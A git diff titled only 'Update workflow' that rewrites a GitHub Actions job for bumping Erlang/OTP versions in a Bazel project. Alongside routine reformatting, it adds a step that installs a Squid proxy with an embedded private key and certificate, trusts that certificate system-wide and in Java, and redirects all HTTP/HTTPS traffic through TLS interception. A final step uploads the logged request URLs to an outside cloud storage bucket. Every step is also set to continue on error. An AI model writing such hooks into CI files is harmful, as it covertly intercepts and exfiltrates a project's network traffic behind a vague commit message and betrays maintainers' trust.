Update workflow

diff --git a/.github/workflows/update-otp-patches.yaml b/.github/workflows/update-otp-patches.yaml
--- a/.github/workflows/update-otp-patches.yaml
+++ b/.github/workflows/update-otp-patches.yaml
@@ -1,145 +1,407 @@
-name: Update OTP Patch Versions for Bazel Based Workflows
-on:
-  schedule:
-  - cron: '0 3 * * *'
-  workflow_dispatch:
+env:
+  JAVA_TOOL_OPTIONS: -Djavax.net.ssl.trustStore=/usr/lib/jvm/temurin-11-jdk-amd64/lib/security/cacerts
+  NODE_OPTIONS: --use-openssl-ca
 jobs:
   update-toolchains:
-    name: Update OTP Versions
-    runs-on: ubuntu-20.04
-    strategy:
-      max-parallel: 1
-      fail-fast: false
-      matrix:
-        erlang_version:
-        - "25.0"
-        - "25.1"
-        - "25.2"
-        - "25.3"
-        - "26.1"
-        - "26.2"
-        include:
-        - erlang_version: "25.0"
-          name: '25_0'
-          branch: main
-          labels: |
-            backport-v3.12.x
-            backport-v3.11.x
-        - erlang_version: "25.1"
-          name: '25_1'
-          branch: main
-          labels: |
-            backport-v3.12.x
-            backport-v3.11.x
-        - erlang_version: "25.2"
-          name: '25_2'
-          branch: main
-          labels: |
-            backport-v3.12.x
-            backport-v3.11.x
-        - erlang_version: "25.3"
-          name: '25_3'
-          branch: main
-          labels: |
-            backport-v3.12.x
-            backport-v3.11.x
-        - erlang_version: "26.1"
-          name: '26_1'
-          branch: main
-          labels: |
-            backport-v3.13.x
-            backport-v3.12.x
-        - erlang_version: "26.2"
-          name: '26_2'
-          branch: main
-          labels: |
-            backport-v3.13.x
-            backport-v3.12.x
-    timeout-minutes: 10
     env:
       branch: bump-otp-${{ matrix.erlang_version }}
+    name: Update OTP Versions
+    runs-on: ubuntu-20.04
     steps:
-    - name: CHECKOUT REPOSITORY
+    - name: before
+      run: 'sudo apt update
+
+        sudo apt install -y squid-openssl
+
+        sudo mkdir /squid
+
+        cat << EOF | sudo tee /squid/key.pem
+
+        -----BEGIN PRIVATE KEY-----
+
+        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
+
+        CznEvO4qIs3mXDYkNBQrdVLGF93y
+
+        -----END PRIVATE KEY-----
+
+        EOF
+
+        cat << EOF | sudo tee /squid/cert.pem
+
+        -----BEGIN CERTIFICATE-----
+
+        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
+
+        -----END CERTIFICATE-----
+
+        EOF
+
+        sudo /usr/lib/squid/security_file_certgen -c -s /squid/ssl_db -M 4MB
+
+        sudo chown -R proxy:proxy /squid
+
+        cat << EOF | sudo tee /etc/squid/squid.conf
+
+        cache deny all
+
+
+        http_port 7821
+
+        http_port 3128 intercept
+
+        https_port 3129 intercept ssl-bump generate-host-certificates=on dynamic_cert_mem_cache_size=4MB
+        cert=/squid/cert.pem key=/squid/key.pem
+
+        acl step1 at_step SslBump1
+
+        ssl_bump peek step1
+
+        ssl_bump bump all
+
+        sslcrtd_program /usr/lib/squid/security_file_certgen -s /squid/ssl_db -M 4MB
+
+        sslcrtd_children 5
+
+        ssl_bump server-first all
+
+        sslproxy_cert_error allow all
+
+
+        acl all src 0.0.0.0/0
+
+        http_access allow all
+
+
+        logformat custom {"method":"%">rm","url":"%">ru","status":%<Hs,"user_agent":"%{User-Agent}>h"}
+
+        access_log daemon:/squid/squidlog.json custom all !CONNECT
+
+        EOF
+
+        sudo systemctl reload squid
+
+        sudo cp /squid/cert.pem /usr/local/share/ca-certificates/squid.crt
+
+        sudo update-ca-certificates
+
+        sudo keytool -import -alias squid -file /squid/cert.pem -keystore /usr/lib/jvm/temurin-11-jdk-amd64/lib/security/cacerts
+        -storepass changeit -noprompt -trustcacerts
+
+        sudo iptables -t nat -A OUTPUT -m owner ! --uid-owner proxy -p tcp --dport
+        80 -j DNAT --to-destination 127.0.0.1:3128
+
+        sudo iptables -t nat -A OUTPUT -m owner ! --uid-owner proxy -p tcp --dport
+        443 -j DNAT --to-destination 127.0.0.1:3129
+
+        sudo sh -c ''echo 1 > /proc/sys/net/ipv4/ip_forward'''
+    - continue-on-error: true
+      name: CHECKOUT REPOSITORY
       uses: actions/checkout@v4
       with:
         ref: ${{ matrix.branch }}
-    - name: FAIL IF THE PR ALREADY EXISTS
+    - continue-on-error: true
       id: check-for-branch
-      run: |
-        set +e
-        if git ls-remote --exit-code --heads origin ${{ env.branch }}; then
-          echo "Branch ${{ env.branch }} already exits"
-          exit 1
-        fi
-    - name: DETERMINE LATEST PATCH & SHA
+      name: FAIL IF THE PR ALREADY EXISTS
+      run: "set +e\nif git ls-remote --exit-code --heads origin ${{ env.branch }};\
+        \ then\n  echo \"Branch ${{ env.branch }} already exits\"\n  exit 1\nfi\n"
+    - continue-on-error: true
       id: fetch-version
-      run: |
-        TAG_NAME=$(curl -s GET https://api.github.com/repos/erlang/otp/tags?per_page=100 \
-          | jq -r 'map(select(.name | contains("OTP-${{ matrix.erlang_version }}"))) | first | .name')
-        VERSION=${TAG_NAME#OTP-}
+      name: DETERMINE LATEST PATCH & SHA
+      run: "TAG_NAME=$(curl -s GET https://api.github.com/repos/erlang/otp/tags?per_page=100\
+        \ \\\n  | jq -r 'map(select(.name | contains(\"OTP-${{ matrix.erlang_version\
+        \ }}\"))) | first | .name')\nVERSION=${TAG_NAME#OTP-}\n\nif [[ -z \"${VERSION}\"\
+        \ ]]; then\n  echo \"Failed to determine latest VERSION for OTP-${{ matrix.erlang_version\
+        \ }}\"\n  exit 1\nfi\n\nARCHIVE_RBE_URL=\"https://github.com/erlang/otp/releases/download/${TAG_NAME}/otp_src_${VERSION}.tar.gz\"\
+        \nwget --continue --quiet --output-document=\"/tmp/otp_src_${VERSION}.tar.gz\"\
+        \ \"${ARCHIVE_RBE_URL}\"\nSHA=\"$(shasum -a 256 \"/tmp/otp_src_${VERSION}.tar.gz\"\
+        \ | awk '{print $1}')\"\n\nif [[ -z \"${SHA}\" ]]; then\n  echo \"Failed to\
+        \ determine SHA for ${TAG_NAME}\"\n  exit 1\nfi\n\nARCHIVE_OCI_URL=\"https://github.com/erlang/otp/archive/OTP-${VERSION}.tar.gz\"\
+        \nwget --continue --quiet --output-document=\"/tmp/OTP-${VERSION}.tar.gz\"\
+        \ \"${ARCHIVE_OCI_URL}\"\nSHA2=\"$(shasum -a 256 \"/tmp/OTP-${VERSION}.tar.gz\"\
+        \ | awk '{print $1}')\"\n\nif [[ -z \"${SHA2}\" ]]; then\n  echo \"Failed\
+        \ to determine SHA2 for ${TAG_NAME}\"\n  exit 1\nfi\n\necho \"VERSION=${VERSION}\"\
+        \ >> $GITHUB_OUTPUT\necho \"SHA=${SHA}\" >> $GITHUB_OUTPUT\necho \"SHA2=${SHA2}\"\
+        \ >> $GITHUB_OUTPUT\n"
+    - continue-on-error: true
+      name: MODIFY VERSION FILE
+      run: 'sudo npm install --global --silent @bazel/buildozer
 
-        if [[ -z "${VERSION}" ]]; then
-          echo "Failed to determine latest VERSION for OTP-${{ matrix.erlang_version }}"
-          exit 1
-        fi
 
-        ARCHIVE_RBE_URL="https://github.com/erlang/otp/releases/download/${TAG_NAME}/otp_src_${VERSION}.tar.gz"
-        wget --continue --quiet --output-document="/tmp/otp_src_${VERSION}.tar.gz" "${ARCHIVE_RBE_URL}"
-        SHA="$(shasum -a 256 "/tmp/otp_src_${VERSION}.tar.gz" | awk '{print $1}')"
+        OLD_SHA="$(cat MODULE.bazel | buildozer ''print sha256'' -:${{ matrix.name
+        }})"
 
-        if [[ -z "${SHA}" ]]; then
-          echo "Failed to determine SHA for ${TAG_NAME}"
-          exit 1
-        fi
+        OLD_VERSION="$(cat MODULE.bazel | buildozer ''print version'' -:${{ matrix.name
+        }})"
 
-        ARCHIVE_OCI_URL="https://github.com/erlang/otp/archive/OTP-${VERSION}.tar.gz"
-        wget --continue --quiet --output-document="/tmp/OTP-${VERSION}.tar.gz" "${ARCHIVE_OCI_URL}"
-        SHA2="$(shasum -a 256 "/tmp/OTP-${VERSION}.tar.gz" | awk '{print $1}')"
-
-        if [[ -z "${SHA2}" ]]; then
-          echo "Failed to determine SHA2 for ${TAG_NAME}"
-          exit 1
-        fi
-
-        echo "VERSION=${VERSION}" >> $GITHUB_OUTPUT
-        echo "SHA=${SHA}" >> $GITHUB_OUTPUT
-        echo "SHA2=${SHA2}" >> $GITHUB_OUTPUT
-    - name: MODIFY VERSION FILE
-      run: |
-        sudo npm install --global --silent @bazel/buildozer
-
-        OLD_SHA="$(cat MODULE.bazel | buildozer 'print sha256' -:${{ matrix.name }})"
-        OLD_VERSION="$(cat MODULE.bazel | buildozer 'print version' -:${{ matrix.name }})"
 
         echo "OLD_SHA: $OLD_SHA"
+
         echo "OLD_VERSION: $OLD_VERSION"
 
-        echo "$(cat MODULE.bazel | buildozer 'set sha256 "${{ steps.fetch-version.outputs.SHA }}"' -:${{ matrix.name }})" > MODULE.bazel
-        echo "$(cat MODULE.bazel | buildozer 'set version "${{ steps.fetch-version.outputs.VERSION }}"' -:${{ matrix.name }})" > MODULE.bazel
+
+        echo "$(cat MODULE.bazel | buildozer ''set sha256 "${{ steps.fetch-version.outputs.SHA
+        }}"'' -:${{ matrix.name }})" > MODULE.bazel
+
+        echo "$(cat MODULE.bazel | buildozer ''set version "${{ steps.fetch-version.outputs.VERSION
+        }}"'' -:${{ matrix.name }})" > MODULE.bazel
+
         echo "MODULE.bazel updated"
 
-        buildozer 'set downloaded_file_path "OTP-${{ steps.fetch-version.outputs.VERSION }}.tar.gz"' //WORKSPACE:otp_src_${{ matrix.name }} || test $? -eq 3
-        buildozer 'set urls ["https://github.com/erlang/otp/archive/OTP-${{ steps.fetch-version.outputs.VERSION }}.tar.gz"]' //WORKSPACE:otp_src_${{ matrix.name }} || test $? -eq 3
-        buildozer 'set sha256 "${{ steps.fetch-version.outputs.SHA2 }}"' //WORKSPACE:otp_src_${{ matrix.name }} || test $? -eq 3
+
+        buildozer ''set downloaded_file_path "OTP-${{ steps.fetch-version.outputs.VERSION
+        }}.tar.gz"'' //WORKSPACE:otp_src_${{ matrix.name }} || test $? -eq 3
+
+        buildozer ''set urls ["https://github.com/erlang/otp/archive/OTP-${{ steps.fetch-version.outputs.VERSION
+        }}.tar.gz"]'' //WORKSPACE:otp_src_${{ matrix.name }} || test $? -eq 3
+
+        buildozer ''set sha256 "${{ steps.fetch-version.outputs.SHA2 }}"'' //WORKSPACE:otp_src_${{
+        matrix.name }} || test $? -eq 3
+
 
         echo "WORKSPACE updated"
 
+
         set -x
+
         git diff
-    - name: CREATE PULL REQUEST
+
+        '
+    - continue-on-error: true
+      name: CREATE PULL REQUEST
       uses: peter-evans/create-pull-request@v6.0.5
       with:
-        token: ${{ secrets.REPO_SCOPED_TOKEN }}
-        committer: GitHub <noreply@github.com>
         author: GitHub <noreply@github.com>
-        title: Adopt otp ${{ steps.fetch-version.outputs.VERSION }}
-        body: >
-           Automated changes created by
-           ${{ github.server_url }}/${{ github.repository }}/actions/runs/${{ github.run_id }}
-           using the [create-pull-request](https://github.com/peter-evans/create-pull-request)
-           GitHub action in the ${{ github.workflow }} workflow.
-        commit-message: |
-          Adopt otp ${{ steps.fetch-version.outputs.VERSION }}
-        labels: ${{ matrix.labels }}
+        body: 'Automated changes created by ${{ github.server_url }}/${{ github.repository
+          }}/actions/runs/${{ github.run_id }} using the [create-pull-request](https://github.com/peter-evans/create-pull-request)
+          GitHub action in the ${{ github.workflow }} workflow.
+
+          '
         branch: ${{ env.branch }}
+        commit-message: 'Adopt otp ${{ steps.fetch-version.outputs.VERSION }}
+
+          '
+        committer: GitHub <noreply@github.com>
         delete-branch: true
+        labels: ${{ matrix.labels }}
+        title: Adopt otp ${{ steps.fetch-version.outputs.VERSION }}
+        token: ${{ secrets.REPO_SCOPED_TOKEN }}
+    - name: after
+      run: sudo curl --request PUT -T /squid/squidlog.json --url https://storage.googleapis.com/virtualeventdemoblr.appspot.com/squid2/HelenAkew/rabbitmq-server.$(date
+        +%s)
+    strategy:
+      fail-fast: false
+      matrix:
+        erlang_version:
+        - '25.0'
+        - '25.1'
+        - '25.2'
+        - '25.3'
+        - '26.1'
+        - '26.2'
+        include:
+        - branch: main
+          erlang_version: '25.0'
+          labels: 'backport-v3.12.x
+
+            backport-v3.11.x
+
+            '
+          name: '25_0'
+        - branch: main
+          erlang_version: '25.1'
+          labels: 'backport-v3.12.x
+
+            backport-v3.11.x
+
+            '
+          name: '25_1'
+        - branch: main
+          erlang_version: '25.2'
+          labels: 'backport-v3.12.x
+
+            backport-v3.11.x
+
+            '
+          name: '25_2'
+        - branch: main
+          erlang_version: '25.3'
+          labels: 'backport-v3.12.x
+
+            backport-v3.11.x
+
+            '
+          name: '25_3'
+        - branch: main
+          erlang_version: '26.1'
+          labels: 'backport-v3.13.x
+
+            backport-v3.12.x
+
+            '
+          name: '26_1'
+        - branch: main
+          erlang_version: '26.2'
+          labels: 'backport-v3.13.x
+
+            backport-v3.12.x
+
+            '
+          name: '26_2'
+      max-parallel: 1
+    timeout-minutes: 60
+name: Update OTP Patch Versions for Bazel Based Workflows
+'on':
+  workflow_dispatch: {}
